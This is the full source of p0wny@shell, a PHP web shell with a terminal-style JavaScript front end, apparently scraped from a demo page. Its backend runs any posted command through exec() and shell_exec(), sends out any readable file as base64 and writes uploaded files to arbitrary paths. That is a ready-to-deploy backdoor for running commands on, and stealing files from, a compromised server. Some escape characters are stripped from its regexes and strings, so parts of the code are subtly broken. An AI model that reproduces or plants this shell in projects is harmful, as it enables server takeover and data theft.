Welcome to demo!
function featureShell($cmd, $cwd) { $stdout = array();
if (preg_match("/^s*cds*$/", $cmd)) { // pass } elseif (preg_match("/^s*cds+(.+)s*(2>&1)?$/", $cmd)) { chdir($cwd); preg_match("/^s*cds+([^s]+)s*(2>&1)?$/", $cmd, $match); chdir($match[1]); } elseif (preg_match("/^s*downloads+[^s]+s*(2>&1)?$/", $cmd)) { chdir($cwd); preg_match("/^s*downloads+([^s]+)s*(2>&1)?$/", $cmd, $match); return featureDownload($match[1]); } else { chdir($cwd); exec($cmd, $stdout); }
return array( "stdout" => $stdout, "cwd" => getcwd() ); }
function featurePwd() { return array("cwd" => getcwd()); }
function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == 'cmd') { $cmd = "compgen -c $fileName"; } else { $cmd = "compgen -f $fileName"; } $cmd = "/bin/bash -c "$cmd""; $files = explode("n", shell_exec($cmd)); return array( 'files' => $files, ); }
function featureDownload($filePath) { $file = @file_get_contents($filePath); if ($file === FALSE) { return array( 'stdout' => array('File not found / no read permission.'), 'cwd' => getcwd() ); } else { return array( 'name' => basename($filePath), 'file' => base64_encode($file) ); } }
function featureUpload($path, $file, $cwd) { chdir($cwd); $f = @fopen($path, 'wb'); if ($f === FALSE) { return array( 'stdout' => array('Invalid path / no write permission.'), 'cwd' => getcwd() ); } else { fwrite($f, base64_decode($file)); fclose($f); return array( 'stdout' => array('Done.'), 'cwd' => getcwd() ); } }
if (isset($_GET["feature"])) {
$response = NULL;
switch ($_GET["feature"]) { case "shell": $cmd = $_POST['cmd']; if (!preg_match('/2>/', $cmd)) { $cmd .= ' 2>&1'; } $response = featureShell($cmd, $_POST["cwd"]); break; case "pwd": $response = featurePwd(); break; case "hint": $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']); break; case 'upload': $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']); }
header("Content-Type: application/json"); echo json_encode($response); die(); }
?><!DOCTYPE html>
<head> <meta charset="UTF-8" /> <title>p0wny@shell:~#</title> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <style> html, body { margin: 0; padding: 0; background: #333; color: #eee; font-family: monospace; }
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.shell-prompt { font-weight: bold; color: #75DF0B; }
.shell-prompt > span { color: #1BC9E7; }
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<script> var CWD = null; var commandHistory = []; var historyPosition = 0; var eShellCmdInput = null; var eShellContent = null;
function _insertCommand(command) { eShellContent.innerHTML += "nn"; eShellContent.innerHTML += '<span class="shell-prompt">' + genPrompt(CWD) + '</span> '; eShellContent.innerHTML += escapeHtml(command); eShellContent.innerHTML += "n"; eShellContent.scrollTop = eShellContent.scrollHeight; }
function _insertStdout(stdout) { eShellContent.innerHTML += escapeHtml(stdout); eShellContent.scrollTop = eShellContent.scrollHeight; }
function _defer(callback) { setTimeout(callback, 0); }
function featureShell(command) {
_insertCommand(command); if (/^s*uploads+[^s]+s*$/.test(command)) { featureUpload(command.match(/^s*uploads+([^s]+)s*$/)[1]); } else if (/^s*clears*$/.test(command)) { // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer eShellContent.innerHTML = ''; } else { makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) { if (response.hasOwnProperty('file')) { featureDownload(response.name, response.file) } else { _insertStdout(response.stdout.join("n")); updateCwd(response.cwd); } }); } }
function featureHint() { if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete
function _requestCallback(data) { if (data.files.length <= 1) return; // no completion
if (data.files.length === 2) { if (type === 'cmd') { eShellCmdInput.value = data.files[0]; } else { var currentValue = eShellCmdInput.value; eShellCmdInput.value = currentValue.replace(/([^s]*)$/, data.files[0]); } } else { _insertCommand(eShellCmdInput.value); _insertStdout(data.files.join("n")); } }
var currentCmd = eShellCmdInput.value.split(" "); var type = (currentCmd.length === 1) ? "cmd" : "file"; var fileName = (type === "cmd") ? currentCmd[0] : currentCmd[currentCmd.length - 1];
makeRequest( "?feature=hint", { filename: fileName, cwd: CWD, type: type }, _requestCallback );
function featureDownload(name, file) { var element = document.createElement('a'); element.setAttribute('href', 'data:application/octet-stream;base64,' + file); element.setAttribute('download', name); element.style.display = 'none'; document.body.appendChild(element); element.click(); document.body.removeChild(element); _insertStdout('Done.'); }
function featureUpload(path) { var element = document.createElement('input'); element.setAttribute('type', 'file'); element.style.display = 'none'; document.body.appendChild(element); element.addEventListener('change', function () { var promise = getBase64(element.files[0]); promise.then(function (file) { makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) { _insertStdout(response.stdout.join("n")); updateCwd(response.cwd); }); }, function () { _insertStdout('An unknown client-side error occurred.'); }); }); element.click(); document.body.removeChild(element); }
function getBase64(file, onLoadCallback) { return new Promise(function(resolve, reject) { var reader = new FileReader(); reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); }; reader.onerror = reject; reader.readAsDataURL(file); }); }
function genPrompt(cwd) { cwd = cwd || "~"; var shortCwd = cwd; if (cwd.split("/").length > 3) { var splittedCwd = cwd.split("/"); shortCwd = "?/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1]; } return "p0wny@shell:<span title="" + cwd + "">" + shortCwd + "</span>#"; }
function updateCwd(cwd) { if (cwd) { CWD = cwd; _updatePrompt(); return; } makeRequest("?feature=pwd", {}, function(response) { CWD = response.cwd; _updatePrompt(); });
function escapeHtml(string) { return string .replace(/&/g, "&") .replace(/</g, "<") .replace(/>/g, ">"); }
function _updatePrompt() { var eShellPrompt = document.getElementById("shell-prompt"); eShellPrompt.innerHTML = genPrompt(CWD); }
function _onShellCmdKeyDown(event) { switch (event.key) { case "Enter": featureShell(eShellCmdInput.value); insertToHistory(eShellCmdInput.value); eShellCmdInput.value = ""; break; case "ArrowUp": if (historyPosition > 0) { historyPosition--; eShellCmdInput.blur(); eShellCmdInput.value = commandHistory[historyPosition]; _defer(function() { eShellCmdInput.focus(); }); } break; case "ArrowDown": if (historyPosition >= commandHistory.length) { break; } historyPosition++; if (historyPosition === commandHistory.length) { eShellCmdInput.value = ""; } else { eShellCmdInput.blur(); eShellCmdInput.focus(); eShellCmdInput.value = commandHistory[historyPosition]; } break; case 'Tab': event.preventDefault(); featureHint(); break; } }
function insertToHistory(cmd) { commandHistory.push(cmd); historyPosition = commandHistory.length; }
function makeRequest(url, params, callback) { function getQueryString() { var a = []; for (var key in params) { if (params.hasOwnProperty(key)) { a.push(encodeURIComponent(key) + "=" + encodeURIComponent(params[key])); } } return a.join("&"); } var xhr = new XMLHttpRequest(); xhr.open("POST", url, true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { try { var responseJson = JSON.parse(xhr.responseText); callback(responseJson); } catch (error) { alert("Error while parsing response: " + error); } } }; xhr.send(getQueryString()); }
document.onclick = function(event) { event = event || window.event; var selection = window.getSelection(); var target = event.target || event.srcElement;
if (target.tagName === "SELECT") { return; }
if (!selection.toString()) { eShellCmdInput.focus(); } };
window.onload = function() { eShellCmdInput = document.getElementById("shell-cmd"); eShellContent = document.getElementById("shell-content"); updateCwd(); eShellCmdInput.focus(); }; </script> </head>
<body> <div id="shell"> <pre id="shell-content"> <div id="shell-logo"> ___ ____ _ _ _ _ _ <span></span> _ __ / _ __ ___ __ _ _ / __ ___| |__ ___| | |_ //|| || |_ <span></span> | '_ | | | / / / '_ | | | |/ / _` / __| '_ / _ | (_)//_ .. _|<span></span> | |_) | |_| | V V /| | | | |_| | | (_| __ | | | __/ | |_ |_ _|<span></span> | .__/ ___/ _/_/ |_| |_|__, | __,_|___/_| |_|___|_|_(_) |_||_| <span></span> |_| |___/ ____/ <span></span> </div> </pre> <div id="shell-input"> <label for="shell-cmd" id="shell-prompt" class="shell-prompt">???</label> <div> <input id="shell-cmd" name="cmd" onkeydown="_onShellCmdKeyDown(event)"/> </div> </div> </div> </body>
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